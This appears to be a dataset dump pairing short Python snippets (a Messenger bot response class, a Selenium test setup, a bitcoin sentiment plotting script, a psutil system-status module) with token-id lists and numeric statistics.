:param quick_reply_response_data:
:param attachment_response_data:
:rtype: Response
"""
if self.text:
self.data["message"]["text"] = self.text.eval(text_response_data)
if self.quick_replies:
self.data["message"]["quick_replies"] = self.quick_replies.eval(quick_reply_response_data)
if self.attachments:
if attachment_response_data:
stringified_attachments = json.dumps(self.attachments)
for item in attachment_response_data:
stringified_attachments = stringified_attachments.replace('{}', str(item), 1)
self.attachments = json.loads(stringified_attachments)
print('*' * 100)
self.data["message"]["attachment"] = self.attachments
return self
def send(self, message, types, recipient_id):
"""
HTTP Request to facebook endpoint to send messages
:param message:
:param types:
:param recipient_id:
:return:
"""
data = {
"recipient": {
"id": recipient_id
},
"message": {
type: message[type] for type in types
}
}
if self.params.get('access_token'):
# r = requests.post(
# "https://graph.facebook.com/v4.0/me/messages",
# params=self.params,
# headers=self.headers,
# data=json.dumps(data)
# )
# print(r.text)
return JsonResponse(data, status=200)
else:
return JsonResponse({}, status=200)
| [
11748,
33918,
198,
11748,
28686,
198,
11748,
4738,
198,
198,
11748,
7007,
198,
6738,
42625,
14208,
62,
16302,
1330,
6460,
198,
6738,
42625,
14208,
13,
4023,
1330,
367,
29281,
31077,
11,
449,
1559,
31077,
198,
198,
6738,
31228,
13,
26791,
... | 2.309073 | 2,061 |
# coding: utf-8
import os
from urllib.request import urlopen
import pytest
from selenium.webdriver import Firefox, ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.expected_conditions import staleness_of
from selenium.webdriver.support.wait import WebDriverWait
URL = 'http://localhost:8000/'
HEADLESS = not os.getenv('NO_HEADLESS')
try:
with urlopen(URL):
SERVER_RUNNING = True
except OSError:
SERVER_RUNNING = False
@pytest.fixture
@pytest.mark.skipif(not SERVER_RUNNING, reason='requires local server running')
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
11748,
28686,
198,
6738,
2956,
297,
571,
13,
25927,
1330,
19016,
9654,
198,
198,
11748,
12972,
9288,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
1330,
16802,
11,
7561,
1925,
1299,
198,
6738... | 2.939535 | 215 |
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, date, time, timedelta
import re
import pickle
import time as tm
df = pd.read_csv("bitcoin_auto.csv", dtype={"COMPOUND": float})
df = df.drop_duplicates()
# print(df.head())
df.info()
# tm.sleep(120)
# Handle missing data
# df['COMPOUND'] = df['COMPOUND'].fillna(0)
# today_date = datetime.today()
# event_date = datetime(2018, 4, 13, 21, 0, 0) # Date of Syria bombing announcement
# event_date = datetime(2018, 6, 12, 12, 0, 0) # Date of Korean Summit
# print(event_date)
temp_list = []
for index, row in df.iterrows():
f_date = row['DATE'][4:20]
year = row['DATE'][26:]
f_date = f_date + year
# print(f_date)
regex = re.findall(r"[a-zA-Z]|\d", f_date)
f_date = "".join(regex)
datetime_object = datetime.strptime(f_date, '%b%d%H%M%S%Y')
# print(datetime_object)
t = today_date - datetime_object
# print(t)
temp_list.append(t)
df['T_minus'] = temp_list
f1 = []
f2 = []
for index, row in df.iterrows():
time = (row['T_minus'].days * 24) + (row['T_minus'].seconds/3600)
# time = row['T_minus'].seconds
f1.append(time)
print(time)
f2.append(row['COMPOUND'])
# print(row['COMPOUND'])
# print(len(f1))
# print(len(f2))
# Pickle arrays
f1_file = open('btc_hours_f1.pkl', 'wb')
f2_file = open('btc_hours_f2.pkl', 'wb')
pickle.dump(f1, f1_file)
pickle.dump(f2, f2_file)
# Plot Data
plt.xlabel('Time(hours)')
plt.ylabel('Compound sentiment score')
plt.scatter(f1, f2, c='black', s=1)
plt.show()
| [
201,
198,
11748,
19798,
292,
355,
279,
67,
201,
198,
6738,
1341,
35720,
13,
565,
5819,
1330,
509,
5308,
504,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
201,
198,
6738,
... | 2.166448 | 763 |
from typing import Collection, Dict, Union
from modules import bar
from datetime import timedelta
import psutil
valid_fstypes = ["ntfs", "ext4", "ext3"]
def get_pc_status() -> Union[Dict[str, str], Dict[str, dict], Dict[str, str]]:
"""With the help of the psutil module, scanns the PC for information about all the drives, the memory and the battery, if it has one.
Returns disk, memory, battery in this order.
"""
disks = get_disk_status()
memory = {"RAM":psutil.virtual_memory()._asdict(), "SWAP": psutil.swap_memory()._asdict()}
battery = get_battery_status()
return disks, memory, battery
def get_graphical(bar_size, in_dict=False) -> Union[str, Dict[str, str]]:
"""Using the bar module, creates a visual representation of the system's status.
It shows the disks' and the momory's percentage, the used and the total space, and the battery's remaning lifetime, if it's pugged, and the battery's percentage.
"""
disks, memory, battery = get_pc_status()
bars = bar.loading_bar("", 100, size=bar_size, show="▓", off_show="░")
if battery != None:
bars.update(round(battery["percent"], 1), False)
battery["bar"] = bars.bar()
if in_dict:
d = {}
else:
string = ""
for mp, disk in disks.items():
bars.update(round(disk["percent"], 1), False)
dbar = bars.bar()
tmp = round(int(disk["total"]) / (1024 **3), 2)
total = f"{tmp} GiB"
tmp = round(int(disk["used"]) / (1024 **3), 2)
used = f"{tmp} GiB"
if in_dict:
d[f"{mp.upper()}"]=[total, used, dbar]
else:
string += f"{mp}: Max: {total}, used: {used}\n{dbar}\n"
for key in ["RAM", "SWAP"]:
tmp = round(int(memory[key]["used"]) / (1024 **3), 2)
used = f"{tmp} GiB"
tmp = round(int(memory[key]["total"]) / (1024 **3), 2)
_max = f"{tmp} GiB"
bars.update(round(memory[key]["percent"], 1), False)
_bar = bars.bar()
if in_dict:
d[key]=[_max, used, _bar]
else:
string += f"Max RAM memory: {_max} / Used memory: {used}\n{_bar}\n"
if battery == None:
if in_dict:
d['Battery']=["Not detected"]
else:
string += "Battery not detected!"
else:
tmp = "" if battery["power_plugged"] else "not "
if in_dict:
d["Battery"]=[timedelta(seconds=battery['secsleft']), f"The power is {tmp}plugged in", battery['bar']]
else:
string += f"Remaining battery life: {timedelta(seconds=battery['secsleft'])} and it's {tmp}plugged in.\nBattery status:\n {battery['bar']}"
if in_dict:
return d
else:
return string
if __name__ == "__main__" :
print(get_graphical(25))
| [
6738,
19720,
1330,
12251,
11,
360,
713,
11,
4479,
198,
6738,
13103,
1330,
2318,
198,
6738,
4818,
8079,
1330,
28805,
12514,
198,
11748,
26692,
22602,
198,
12102,
62,
69,
301,
9497,
796,
14631,
429,
9501,
1600,
366,
2302,
19,
1600,
366,
... | 2.314738 | 1,201 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import os
import json
import yaml
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
2,
6434,
25,
266,
87,
77,
1590,
31,
14816,
13,
785,
198,
37811,
198,
198,
37811,
198,
198,
11748,
28686,
198,
11748,
339... | 2.32 | 50 |
import sys
if __name__ == '__main__':
main()
| [
198,
11748,
25064,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
628,
628,
628,
628,
198
] | 2.259259 | 27 |
from .domain import *
from .common import *
| [
6738,
764,
27830,
1330,
1635,
198,
6738,
764,
11321,
1330,
1635,
198
] | 3.666667 | 12 |
import os
import urllib
| [
11748,
28686,
198,
11748,
2956,
297,
571,
628
] | 3.125 | 8 |